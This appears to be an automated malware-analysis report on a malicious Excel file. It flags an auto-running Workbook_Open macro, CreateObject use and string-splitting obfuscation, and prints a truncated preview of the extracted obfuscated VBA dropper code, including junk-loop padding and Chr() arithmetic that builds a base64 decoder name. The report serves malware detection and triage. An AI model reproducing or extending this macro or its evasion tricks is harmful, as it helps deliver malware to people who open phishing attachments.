Verdict: MALICIOUS (Risk Score: 202)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The file is an Excel document containing a Workbook_Open VBA macro. This macro is heavily obfuscated and uses a CreateObject call, indicating it likely attempts to download and execute a second-stage payload. The presence of a Workbook_Open auto-execution event and obfuscated code strongly suggests a malicious intent, likely delivered via spearphishing.
Heuristics (6)

- VBA macros detected (medium, 4 related findings) OLE_VBA_MACROS: Document contains VBA macro code.
- Dangerous API name reassembled from split string literals (critical) OLE_VBA_SPLIT_KEYWORD_OBFUSCATION: VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
- Workbook_Open macro (high) OLE_VBA_WBOPEN: Workbook_Open macro.
- CreateObject call (high) OLE_VBA_CREATEOBJ: CreateObject call.
- VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Suspicious extracted artifact (info) EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13543 bytes |

SHA-256: 88441f0e41b0bc9f29ba954cd8f4dd730f85e132d99bd1c818e1af3c100f7cea

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 4 long base64-like blob(s).
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
teNuAhp3wr.cuBOTk_Bt_x2GWUYaWU3
While 24 = 55
Dim Im_cG_ISHbm As Boolean
Wend
Dim EgHaMKDt_VOkvvS As Worksheet
While 17 = 52
Dim s_dplcV5yt As Boolean
Wend
Dim hGSZt2QZ6ui As Worksheet
While 27 = 50
Dim N3KOSk2vWWqT As Boolean
Wend
Dim pZSnvAWslRpoC As Worksheet
While 13 = 56
Dim sRNc8Iy_scE As Boolean
Wend
Dim QZQ1cGaU1vm9ZM As Worksheet
While 6 = 41
Dim eYhB75LfKiRl As Boolean
Wend
Dim RYM1T67LUTrfNc As Worksheet
While 27 = 43
Dim SwOERxObsO8v As Boolean
Wend
Dim g3uMrhzyBG9ap As Worksheet
While 7 = 35
Dim BL1IqBvbD2r5c9x As Boolean
Wend
Dim B6cjUIXSjF As Worksheet
While 1 = 41
Dim XmxKxwYOjWRA As Boolean
Wend
Dim MJRc_BQNhBv_mW As Worksheet
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "teNuAhp3wr"
Dim bPBuSgeImr1N_C1HR9pyUOyYXaz6TFCBPnj9tMCCh_cUBw_Eg3PiG_gKakV1phyeox7Ya1XD5lOTvcWjZtXZzb4KEWgG1KV_J7oLyimocKmdxKY8LuY6IW As String
Dim xYzKUL1f1gTUrZmEH5RVQ4fW4SZg9UVql1KgCPv_WjDJFD3B_HYBiix4 As String
Dim oOj4XP4_MRumrAtK83cCTwxXa1k951pRXwU1z7711xI77M1rGfQWAjk1ZKagn4IUkaN5n2U_6kJfmzZM931WiQQwJdYmeXK7nwUe95CNJPaXYDLjuMguCuvRHZsIbqdfXM1zd5NCzlLRz3W As String
Dim hrM7nA8eHbXIFdfWGLWUq_XmhigqQUYwL4GXAUdudqIotAqRjCBwfS_hRiWDbPLvCk6LUGUvqkz9ys2g2MFNRkP23i_a8YRMdVkHDd7bpOE4bAr As Integer
Function fm3PBqDWyNp3GCsLnmaVJz5SgxtXVzsgZr3lqFOSIwcMRGIJxxGZJA4pr(Pg6Nj9uS4S6EKIPlmg4AUj2NqP1lfFY_Idqnk_bVW5slXVS6UPKCYifooqfRGGvv355palAl_glY1NzT65PN5Uii8A84cHMNG6rbZlcsOh827E)
While 1 = 37
Dim jeVsn5Iy1WX1DL As Boolean
Wend
Dim jWUPExqzdjz15 As Worksheet
While 12 = 42
Dim YGoCzJS7RDpUZS As Boolean
Wend
Dim ggpTdCuMB_NLB9 As Worksheet
While 12 = 56
Dim tAu2v_tqKThosNQ As Boolean
Wend
Dim So5ndHQxOUw As Worksheet
Dim Io6v_1ltcjQ_21sh2LWTOKG_Pdt5QHXQhjNXam_QjBjUjtFLe4KWfqN7f1djEpaSJ_eQlSEMGEsLkucfVfYW7At1UQ1iGdK4jPJjNxjJw7OZ7ATuW8LhOCVHNm6TbfEl4ykTj2
While 16 = 37
Dim IK_nwlHTKQQwhZ As Boolean
Wend
Dim izUTuxSe5qSSh As Worksheet
While 24 = 47
Dim gyaKef9yhk As Boolean
Wend
Dim ff6eWC_B2VL5R6 As Worksheet
While 7 = 50
Dim bcfcnOVTcCkes_u As Boolean
Wend
Dim OhkANyxxQ5 As Worksheet
Dim WRjD4BrSkL3kFmQnIXhUDlVocKMKk_pKmzySUuz_RvgXf8UCZW9cjgat54iqweqjep8Pw7RWggCP_8GdzJuM_Lk_XDXZJHLvD63z__NbDj5Bd
While 3 = 55
Dim b4oa6TkferA9 As Boolean
Wend
Dim eJQMKC342R4Okwk As Worksheet
While 21 = 49
Dim DEnnMgKUq2fq9 As Boolean
Wend
Dim MVsPCYr_mt As Worksheet
While 7 = 49
Dim WCH9XzHsqbYC As Boolean
Wend
Dim Vt796fReJ53_ As Worksheet
While 5 = 31
Dim gfSsJJCa3rzdBUQ As Boolean
Wend
Dim BW8PewRVe_ZvcTN As Worksheet
While 4 = 37
Dim tbHDa2eXhfX As Boolean
Wend
Dim Hm4b6jMPFKmVPN As Worksheet
While 18 = 48
Dim HxnsWiFn8W As Boolean
Wend
Dim T73Xe9YtFzHsjk As Worksheet
Set WRjD4BrSkL3kFmQnIXhUDlVocKMKk_pKmzySUuz_RvgXf8UCZW9cjgat54iqweqjep8Pw7RWggCP_8GdzJuM_Lk_XDXZJHLvD63z__NbDj5Bd = CreateObject(xYzKUL1f1gTUrZmEH5RVQ4fW4SZg9UVql1KgCPv_WjDJFD3B_HYBiix4)
While 27 = 55
Dim cKNCFhxuwLsptx As Boolean
Wend
Dim GxydnfF9pxtGv3 As Worksheet
While 26 = 59
Dim OY_XLBNKTDfY As Boolean
Wend
Dim hiHpoyNjkQAn As Worksheet
While 12 = 49
Dim DDddeYQ9u5eW As Boolean
Wend
Dim FSbqi6ct8N7gy As Worksheet
bPBuSgeImr1N_C1HR9pyUOyYXaz6TFCBPnj9tMCCh_cUBw_Eg3PiG_gKakV1phyeox7Ya1XD5lOTvcWjZtXZzb4KEWgG1KV_J7oLyimocKmdxKY8LuY6IW = Chr(369 - 271) & Chr(295 - 190) & Chr(307 - 197) & Chr(246 - 200) & Chr(452 - 354) & Chr(404 - 307) & Chr(424 - 309) & Chr(261 - 160) & Chr(73 - 19) & Chr(179 - 127)
While 1 = 59
Dim G53KP7XZTGgto4u As Boolean
Wend
Dim fmmDuhUUf_o
... (truncated)